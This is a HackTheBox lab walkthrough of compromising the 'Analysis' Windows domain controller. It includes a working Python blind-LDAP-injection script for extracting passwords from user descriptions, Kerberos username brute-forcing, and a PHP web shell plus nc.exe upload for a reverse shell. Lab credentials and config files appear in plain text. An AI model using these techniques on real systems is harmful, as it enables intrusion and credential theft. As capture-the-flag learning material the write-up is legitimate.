HackTheBox | Analysis

In this walkthrough, I demonstrate how I obtained complete ownership of Analysis on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Hard Challenge
Owned Analysis from Hack The Box!
I have just owned machine Analysis from Hack The Box

Nmap Results

ℹ️
Right from the start, this machine proved to be a little non-standard. The typical SYN scan didn't work, and required me to run a full TCP connect scan.
sudo nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.250

-sT for full TCP connect scan

# Nmap 7.94SVN scan initiated Fri Jan 26 12:09:18 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.250
Nmap scan report for 10.10.11.250
Host is up (0.012s latency).
Not shown: 65507 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-26 17:09:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL (unauthorized)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49726/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=1/26%Time=65B3E74E%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RT
SF:SPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x0
SF:1\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x0
SF:5\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(TerminalServerCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSess
SF:ionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\
SF:x1a\x0fInvalid\x20message\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSear
SF:chReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x
SF:1a\x0fInvalid\x20message\"\x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\x1a\*Parse\x20error\x20unse
SF:rializing\x20protobuf\x20message\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0
SF:\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(oracle-tns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x16Invalid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")
SF:%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/26%OT=53%CT=1%CU=34827%PV=Y%DS=2%DC=T%G=Y%TM=65B3
OS:E799%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=FF%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8NNS%
OS:O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(W1=F
OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M
OS:53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=8
OS:0%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-26T17:10:41
|_  start_date: N/A

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   11.19 ms 10.10.14.1
2   11.24 ms 10.10.11.250

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 26 12:10:49 2024 -- 1 IP address (1 host up) scanned in 90.41 seconds
ℹ️
You should always look for breadcrumbs in the initial nmap output. You'll notice on tcp/389 (LDAP) that there's a root domain name of analysis.htb. Add that to your hosts file.
echo '10.10.11.250        analysis.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/389

ℹ️
You should always look for breadcrumbs in the initial nmap output. You'll notice on tcp/389 (LDAP) that there's a LDAP default site name of analysis.htb0.
sudo nmap -Pn -sT -p389 -T4 --script ldap-rootdse 10.10.11.250

Query the Root DSE of the LDAP server

LDAPWiki: RootDSE
Page version 1, last modified by UnknownAuthor, on
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=analysis,DC=htb
|       ldapServiceName: analysis.htb:dc-analysis$@ANALYSIS.HTB
...
...

Snippet of the Root DSE

We can see the domain context is DC=analysis,DC=htb, indicating a root domain of analysis.htb and the LDAP server is named dc-analysis. Let's add the domain to our hosts file.

echo '10.10.11.250        analysis.htb' | sudo tee -a /etc/hosts
No anonymous LDAP binds allowed, we'll need a credential to enumerate more



TCP/53

Attempted zone transfer of 'analysis.htb' was refused



TCP/139,445

Anonymous login successful, but no shares available to enumerate
Both crackmapexec and enum4linux anonymous enumeration failed



TCP/88

cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | tr '[:upper:]' '[:lower:]' | sort -u > kerberos_users.txt

Deduplicate and create a list of potential usernames to enumerate

kerbrute userenum -d analysis.htb --dc 10.10.11.250 -t 100 -o kerbrute.log ./kerberos_users.txt

Bruteforce Kerberos to enumerate valid usernames

Output is also stored in 'kerberos.log'
No AS-REP roasting



TCP/80

Gobuster Enumeration

Directories and Files

gobuster dir -u http://analysis.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80.txt -t 100
/Images               (Status: 301) [Size: 162] [--> http://analysis.htb/Images/]
/Index.html           (Status: 200) [Size: 17830]
/bat                  (Status: 301) [Size: 159] [--> http://analysis.htb/bat/]
/css                  (Status: 301) [Size: 159] [--> http://analysis.htb/css/]
/images               (Status: 301) [Size: 162] [--> http://analysis.htb/images/]
/index.html           (Status: 200) [Size: 17830]
/js                   (Status: 301) [Size: 158] [--> http://analysis.htb/js/]

Nothing too promising here at first glance. This server is clearly using virtual hosts, as the behavior in page loads is different when loading http://10.10.11.250 and http://analysis.htb. Time to enumerate virtual hosts.

Virtual Hosts

gobuster vhost -k --domain analysis.htb --append-domain -u http://10.10.11.250 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
Found: internal.analysis.htb Status: 403 [Size: 1268]
echo '10.10.11.250        internal.analysis.htb' | sudo tee -a /etc/hosts

Add 'internal.analysis.htb' to our hosts file

Enumerating the Virtual Host

gobuster dir -u http://internal.analysis.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80-internal.txt -t 100 
/dashboard            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users                (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]



Enumerate /dashboard

gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx -o gobuster-80-internal.txt -t 100
/404.html             (Status: 200) [Size: 13143]
/css                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/css/]
/img                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/img/]
/js                   (Status: 301) [Size: 177] [--> http://internal.analysis.htb/dashboard/js/]
/lib                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/lib/]
/uploads              (Status: 301) [Size: 182] [--> http://internal.analysis.htb/dashboard/uploads/]
Test the '404.html' page

Clicking around on this page, and it's pretty clear that this is just a static HTML page and doesn't have any real interactive or session management features. None of the other directories discovered appeared to contain anything interesting that I could find.



Enumerate /users and /employees

gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php -o gobuster-80-internal.txt -t 100
/Login.php            (Status: 200) [Size: 1085]
/login.php            (Status: 200) [Size: 1085]

IIS will serve contents regardless of case

Seems like this would pair well with the '/users/list.php' script
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-internal.txt -t 100
/list.php             (Status: 200) [Size: 17]
Parameter and Value Fu... | 0xBEN | Notes
Serving Files From a Web Server NGINX /etc/nginx/sites-available/example.com.conf server {…

Let's see if we can find the valid parameter

💡
When first testing out the gobuster fuzz utility, I notice a lot of web server responses with a content length of 17. We'll have much better luck finding a parameter if we filter this out. To do so, we can use the --exclude-length flag.
gobuster fuzz -u "http://internal.analysis.htb/users/list.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -o 'gobuster-params.txt' --exclude-length 17 
Found: [Status=200] [Length=406] [Word=name] http://internal.analysis.htb/users/list.php?name

The valid parameter is ?name, indicating we should use a full URL of http://internal.analysis.htb/users/list.php?name=VALUE_HERE. Let's see what we can dig up. Here is a list of the usernames from the kerbrute output. Let's see if we can use these to our advantage.

for user in $(cat usernames.txt) ; do curl -s -x http://127.0.0.1:8080 "http://internal.analysis.htb/users/list.php?name=$user" ; done

We'll run a loop over the usernames and request them in the ?name= parameter. We'll also proxy the requests through Burp, so we can view the results.

badam
jangel
technician
💡
One thing that I found funny is that using the * character returns the technician user. Also, using ** as input seems to break the application entirely. The * character is very common in LDAP lookups, so it's entirely possible this PHP script is searching for names using LDAP.



Testing Blind LDAP Injection

Since, we know the parameter is injectable and likely using LDAP, we can search various attributes of the user object in LDAP. One place to look is the user Description field in LDAP, as sometimes, administrators put sensitive information such as passwords here.

LDAP Injection - HackTricks
ℹ️
Since I'm not too familiar with writing scripts to test LDAP injections, I did rely partially on ChatGPT to establish the foundation of this script. After the foundation was built, I iteratively modified it until the end result was achieved.

Python LDAP Injection Script

#! /usr/bin/env python3

import urllib.parse
import requests
import string

# Define the characters to test for the ldap_contents
alphanumeric_chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&()-_=+.;:'"'"'",<.>/?\\|[{]}'

# Define the proxy server to use
proxies = {'http': 'http://127.0.0.1:8080'}

# User Agent
headers = { 
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9'
}

# Empty string to concatenate discovered characters
ldap_contents = ''

# Boolean to indicate if an asterisk should be appended to search or not
try_with_asterisk = False

# Define the base URL and LDAP variables
ldap_object_type = 'user'
ldap_field = 'description'
base_url = f'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass={ldap_object_type})({ldap_field}='

# Loop through each character in the alphanumeric_chars variable
for i in range(1, 100):
    found_char = False
    for char in alphanumeric_chars:

        if try_with_asterisk:
            # Encode any special characters in the ldap_contents
            encoded_char = urllib.parse.quote((ldap_contents + '*' + char), safe="")
        else:
            encoded_char = urllib.parse.quote((ldap_contents + char), safe="")

        url = f'{base_url}{encoded_char}*)'
        response = requests.get(url, proxies=proxies, headers=headers)

        # Check if the character was found in the response
        # Match on 'technician' since that was the user returned when testing injections
        if 'technician' in response.text:
            if try_with_asterisk:
                ldap_contents += ('*' + char)
                try_with_asterisk = False
            else:
                ldap_contents += char

            found_char = True
            break

    if not found_char:
        # We've looped through all of the character options
        # Now, try all of the character options again, except
        # Place an asterisk between the current ldap_contents string and the new loop
        # Do it this way to avoid a '**' double asterisk injection, which breaks the LDAP lookup
        if not try_with_asterisk:
            try_with_asterisk = True
        else:
            # All attempts exhausted, return whatever we've got
            break

    if not try_with_asterisk:
        # Print the current ldap_contents on iterations where not retrying with asterisk
        # No need to duplicate output
        print(f'LDAP contents of {ldap_field} field so far: {ldap_contents}')

# Print the final ldap_contents
if ldap_contents:
    print(f'Final output of LDAP of {ldap_field} field: {ldap_contents}')
else:
    print(f'Nothing found in LDAP field: {ldap_field}')

Pay careful attention to the base_url variable in the script. You'll note the syntax of:

base_url = f'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass={ldap_object_type})({ldap_field}='

Which effectively produces an LDAP query of:

*)(&
(objectClass=user)
(description={encoded_char}*)

So, we're saying, get any user *) which closes this filter, but we open and AND filter (& and require that it be an object type of user and the description should match {encoded_char}.

And, {encoded_char} is a string of characters — URL encoded — that continuously grows as valid matches are found in the description field.

Another example of testing a different LDAP field



Test Credentials on Employee Login





Exploit

A PHP script that is vulnerable to LDAP injection in a development environment is world-accessible and easily discoverable using basic virtual host and file enumeration steps. Using blind LDAP injection, an attacker is able to loop over an alphanumeric set of characters to gather specific information about user objects.

In this particular case, a password was stored in one of the user objects that was enumerated in an earlier step by gathering valid usernames from Kerberos. Once logged into the employee dashboard, a file upload form allows for any file with any extension to be uploaded, and informs the user where the files are uploaded to.

Admin Panel File Upload

Click on 'SOC Report'
Test a file upload of a Windows reverse PHP shell
wwwolf-php-webshell/webshell.php at master · WhiteWinterWolf/wwwolf-php-webshell
WhiteWinterWolf’s PHP web shell. Contribute to WhiteWinterWolf/wwwolf-php-webshell development by creating an account on GitHub.
Web shell saved in 'ws.php'
Can be found in the '/dashboard/uploads' directory found earlier with Gobuster
Copy nc.exe to the currect directory
Upload and execute 'nc.exe' in one go





Post-Exploit Enumeration

Operating Environment

OS & Kernel

WindowsBuildLabEx                                       : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 01/01/1970 00:00:00
WindowsProductId                                        : 
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOrganization                           : 
WindowsRegisteredOwner                                  : Utilisateur Windows
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809
BiosCharacteristics                                     : 
BiosBIOSVersion                                         : 
BiosBuildNumber                                         : 
BiosCaption                                             : 
BiosCodeSet                                             : 
BiosCurrentLanguage                                     : 
BiosDescription                                         : 
BiosEmbeddedControllerMajorVersion                      : 
BiosEmbeddedControllerMinorVersion                      : 
BiosFirmwareType                                        : 
BiosIdentificationCode                                  : 
BiosInstallableLanguages                                : 
BiosInstallDate                                         : 
BiosLanguageEdition                                     : 
BiosListOfLanguages                                     : 
BiosManufacturer                                        : 
BiosName                                                : 
BiosOtherTargetOS                                       : 
BiosPrimaryBIOS                                         : 
BiosReleaseDate                                         : 
BiosSeralNumber                                         : 
BiosSMBIOSBIOSVersion                                   : 
BiosSMBIOSMajorVersion                                  : 
BiosSMBIOSMinorVersion                                  : 
BiosSMBIOSPresent                                       : 
BiosSoftwareElementState                                : 
BiosStatus                                              : 
BiosSystemBiosMajorVersion                              : 
BiosSystemBiosMinorVersion                              : 
BiosTargetOperatingSystem                               : 
BiosVersion                                             : 
CsAdminPasswordStatus                                   : 
CsAutomaticManagedPagefile                              : 
CsAutomaticResetBootOption                              : 
CsAutomaticResetCapability                              : 
CsBootOptionOnLimit                                     : 
CsBootOptionOnWatchDog                                  : 
CsBootROMSupported                                      : 
CsBootStatus                                            : 
CsBootupState                                           : 
CsCaption                                               : 
CsChassisBootupState                                    : 
CsChassisSKUNumber                                      : 
CsCurrentTimeZone                                       : 
CsDaylightInEffect                                      : 
CsDescription                                           : 
CsDNSHostName                                           : 
CsDomain                                                : 
CsDomainRole                                            : 
CsEnableDaylightSavingsTime                             : 
CsFrontPanelResetStatus                                 : 
CsHypervisorPresent                                     : 
CsInfraredSupported                                     : 
CsInitialLoadInfo                                       : 
CsInstallDate                                           : 
CsKeyboardPasswordStatus                                : 
CsLastLoadInfo                                          : 
CsManufacturer                                          : 
CsModel                                                 : 
CsName                                                  : 
CsNetworkAdapters                                       : 
CsNetworkServerModeEnabled                              : 
CsNumberOfLogicalProcessors                             : 
CsNumberOfProcessors                                    : 
CsProcessors                                            : 
CsOEMStringArray                                        : 
CsPartOfDomain                                          : 
CsPauseAfterReset                                       : 
CsPCSystemType                                          : 
CsPCSystemTypeEx                                        : 
CsPowerManagementCapabilities                           : 
CsPowerManagementSupported                              : 
CsPowerOnPasswordStatus                                 : 
CsPowerState                                            : 
CsPowerSupplyState                                      : 
CsPrimaryOwnerContact                                   : 
CsPrimaryOwnerName                                      : 
CsResetCapability                                       : 
CsResetCount                                            : 
CsResetLimit                                            : 
CsRoles                                                 : 
CsStatus                                                : 
CsSupportContactDescription                             : 
CsSystemFamily                                          : 
CsSystemSKUNumber                                       : 
CsSystemType                                            : 
CsThermalState                                          : 
CsTotalPhysicalMemory                                   : 
CsPhyicallyInstalledMemory                              : 
CsUserName                                              : 
CsWakeUpType                                            : 
CsWorkgroup                                             : 
OsName                                                  : 
OsType                                                  : 
OsOperatingSystemSKU                                    : 
OsVersion                                               : 
OsCSDVersion                                            : 
OsBuildNumber                                           : 
OsHotFixes                                              : 
OsBootDevice                                            : 
OsSystemDevice                                          : 
OsSystemDirectory                                       : 
OsSystemDrive                                           : 
OsWindowsDirectory                                      : 
OsCountryCode                                           : 
OsCurrentTimeZone                                       : 
OsLocaleID                                              : 
OsLocale                                                : 
OsLocalDateTime                                         : 
OsLastBootUpTime                                        : 
OsUptime                                                : 
OsBuildType                                             : 
OsCodeSet                                               : 
OsDataExecutionPreventionAvailable                      : 
OsDataExecutionPrevention32BitApplications              : 
OsDataExecutionPreventionDrivers                        : 
OsDataExecutionPreventionSupportPolicy                  : 
OsDebug                                                 : 
OsDistributed                                           : 
OsEncryptionLevel                                       : 
OsForegroundApplicationBoost                            : 
OsTotalVisibleMemorySize                                : 
OsFreePhysicalMemory                                    : 
OsTotalVirtualMemorySize                                : 
OsFreeVirtualMemory                                     : 
OsInUseVirtualMemory                                    : 
OsTotalSwapSpaceSize                                    : 
OsSizeStoredInPagingFiles                               : 
OsFreeSpaceInPagingFiles                                : 
OsPagingFiles                                           : 
OsHardwareAbstractionLayer                              : 
OsInstallDate                                           : 
OsManufacturer                                          : 
OsMaxNumberOfProcesses                                  : 
OsMaxProcessMemorySize                                  : 
OsMuiLanguages                                          : 
OsNumberOfLicensedUsers                                 : 
OsNumberOfProcesses                                     : 
OsNumberOfUsers                                         : 
OsOrganization                                          : 
OsArchitecture                                          : 
OsLanguage                                              : 
OsProductSuites                                         : 
OsOtherTypeDescription                                  : 
OsPAEEnabled                                            : 
OsPortableOperatingSystem                               : 
OsPrimary                                               : 
OsProductType                                           : 
OsRegisteredUser                                        : 
OsSerialNumber                                          : 
OsServicePackMajorVersion                               : 
OsServicePackMinorVersion                               : 
OsStatus                                                : 
OsSuites                                                : 
OsServerLevel                                           : 
KeyboardLayout                                          : 
TimeZone                                                : (UTC+01:00) Bruxelles, Copenhague, Madrid, Paris
LogonServer                                             : 
PowerPlatformRole                                       : Desktop
HyperVisorPresent                                       : 
HyperVRequirementDataExecutionPreventionAvailable       : 
HyperVRequirementSecondLevelAddressTranslation          : 
HyperVRequirementVirtualizationFirmwareEnabled          : 
HyperVRequirementVMMonitorModeExtensions                : 
DeviceGuardSmartStatus                                  : Off
DeviceGuardRequiredSecurityProperties                   : 
DeviceGuardAvailableSecurityProperties                  : 
DeviceGuardSecurityServicesConfigured                   : 
DeviceGuardSecurityServicesRunning                      : 
DeviceGuardCodeIntegrityPolicyEnforcementStatus         : 
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :     

Current User

Informations sur l'utilisateur
------------------------

Nom d'utilisateur SID                                          
================= =============================================
analysis\svc_web  S-1-5-21-916175351-3772503854-3498620144-2101


Informations de groupe
----------------------

Nom du groupe                                       Type              SID                                                           Attributs                                           
=================================================== ================= ============================================================= ====================================================
Tout le monde                                       Groupe bien connu S-1-1-0                                                       Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\Utilisateurs                                Alias             S-1-5-32-545                                                  Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\Acc�s compatible pr�-Windows 2000           Alias             S-1-5-32-554                                                  Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\TACHE                                   Groupe bien connu S-1-5-3                                                       Groupe obligatoire, Activ� par d�faut, Groupe activ�
OUVERTURE DE SESSION DE CONSOLE                     Groupe bien connu S-1-2-1                                                       Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Utilisateurs authentifi�s               Groupe bien connu S-1-5-11                                                      Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Cette organisation                      Groupe bien connu S-1-5-15                                                      Groupe obligatoire, Activ� par d�faut, Groupe activ�
BUILTIN\IIS_IUSRS                                   Alias             S-1-5-32-568                                                  Groupe obligatoire, Activ� par d�faut, Groupe activ�
LOCAL                                               Groupe bien connu S-1-2-0                                                       Groupe obligatoire, Activ� par d�faut, Groupe activ�
IIS APPPOOL\internal                                Groupe bien connu S-1-5-82-780022665-423385827-2835031938-1607344665-2144950284 Groupe obligatoire, Activ� par d�faut, Groupe activ�
AUTORITE NT\Authentifications NTLM                  Groupe bien connu S-1-5-64-10                                                   Groupe obligatoire, Activ� par d�faut, Groupe activ�
�tiquette obligatoire\Niveau obligatoire moyen plus Nom               S-1-16-8448                                                         


Informations de privil�ges
----------------------

Nom de privil�ge              Description                                     �tat     
============================= =============================================== =========
SeIncreaseQuotaPrivilege      Ajuster les quotas de m�moire pour un processus D�sactiv�
SeMachineAccountPrivilege     Ajouter des stations de travail au domaine      D�sactiv�
SeAuditPrivilege              G�n�rer des audits de s�curit�                  D�sactiv�
SeChangeNotifyPrivilege       Contourner la v�rification de parcours          Activ�   
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus     D�sactiv�    



Users and Groups

LDAP Domain Dump

ldapdomaindump -u 'ANALYSIS.HTB\technician' -p '97NTtl*4QP96Bv' analysis.htb -o ldd

Use the 'technician' credential we discovered earlier

These users are able to WinRM into the target
Default domain admin
'technician' account from LDAP showing the password



Network Configurations

Network Interfaces

Configuration IP de Windows


Carte Ethernet Ethernet0 2 :

   Suffixe DNS propre � la connexion. . . : 
   Adresse IPv4. . . . . . . . . . . . . .: 10.10.11.250
   Masque de sous-r�seau. . . .�. . . . . : 255.255.254.0
   Passerelle par d�faut. . . .�. . . . . : 10.10.10.2    



Processes and Services

Interesting Processes

Name        : w3wp.exe
CommandLine : c:\windows\system32\inetsrv\w3wp.exe -ap "internal" -v "v4.0" -l "webengine4.dll" -a 
              \\.\pipe\iisipm8fb8e015-7252-49c2-b715-3deade9f0852 -h 
              "C:\inetpub\temp\apppools\internal\internal.config" -w "" -m 0 -t 20 -ta 0
    
Name        : snort.exe
CommandLine : 

Name        : BCTextEncoder.exe.exe
CommandLine : 

Name        : TextEncode.exe
CommandLine : 

Name        : TextEncode.exe
CommandLine : 

Interesting Services

Name      : SnortSvc
StartName : ANALYSIS\Administrateur
PathName  : C:\Snort\bin\snort.exe /SERVICE 



Interesting Files

C:\inetpub\internal\users\list.php

<?php

//LDAP Bind paramters, need to be a normal AD User account.
error_reporting(0);
$ldap_password = 'N1G6G46G@G!j';
$ldap_username = 'webservice@analysis.htb';
$ldap_connection = ldap_connect("analysis.htb");

if(isset($_GET['name'])){
    if (FALSE === $ldap_connection) {
        // Uh-oh, something is wrong...
        echo 'Unable to connect to the ldap server';
    }

// We have to set this option for the version of Active Directory we are using.
    ldap_set_option($ldap_connection, LDAP_OPT_PROTOCOL_VERSION, 3) or die('Unable to set LDAP protocol version');
    ldap_set_option($ldap_connection, LDAP_OPT_REFERRALS, 0); // We need this for doing an LDAP search.

    if (TRUE === ldap_bind($ldap_connection, $ldap_username, $ldap_password)) {

        //Your domains DN to query
        $ldap_base_dn = 'OU=sysadmins,DC=analysis,DC=htb';

        //Get standard users and contacts
        $search_filter = '(&(objectCategory=person)(objectClass=user)(sAMAccountName='.$_GET['name'].'))';

C:\inetpub\internal\employees\login.php

<?php 
 $host = "localhost";  
 $username = "db_master";  
 $password = '0$TBO7H8s12yh&';  
 $database = "employees";  

$message= "";
 try  
 {  
      $connect = new PDO("mysql:host=$host; dbname=$database", $username, $password);   
      $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
...
...
...

C:\private\encoded.txt

-----BEGIN ENCODED MESSAGE-----
Version: BCTextEncoder Utility v. 1.03.2.1

wy4ECQMCq0jPQTxt+3BgTzQTBPQFbt5KnV7LgBq6vcKWtbdKAf59hbw0KGN9lBIK
